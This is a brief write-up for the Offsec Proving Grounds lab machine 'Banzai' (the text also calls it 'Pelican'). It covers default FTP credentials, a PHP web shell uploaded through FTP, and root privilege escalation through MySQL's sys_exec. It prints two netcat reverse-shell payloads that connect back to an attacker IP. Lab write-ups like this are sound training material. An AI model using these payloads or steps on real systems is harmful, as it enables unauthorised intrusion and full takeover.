Banzai
Writeup for Pelican from offsec Proving Grounds
Information Gathering
sudo ./nmapAutomator.sh 192.168.141.56 all
Service Enumeration
HTTP (Port 8295)
Doesn't look's like there's anything useful here.
SMTP (Port 25)
SMTP user enumeration.
We got the users in SMTP, however, they all need a password to be authenticated.
FTP (Port 21)
We try admin:admin
and we are authenticated!
The files here look very similar to our gobuster result on the web app on port 8295, maybe we can add a PHP web shell and access it from port 8295.
Exploit
Let's upload our web shell onto the FTP server.
Let's navigate to our web shell and we have RCE!
Let's get our interactive shell.
Payload: nc -e /bin/sh 192.168.49.141 22
Privesc
Looks like there is mysql
running as root and credentials to it.
We can follow this trick to gain root.
Look's like the lib_mysqludf_sys.so is missing from our target machine. So let's download it to our attack machine and transfer it to our target machine.
Let's check if our target machine is 32 or 64 bit.
Once we transfer the files, we can try getting a reverse shell.
Payload:
select sys_exec('nc -e /bin/sh 192.168.49.141 22');
Last updated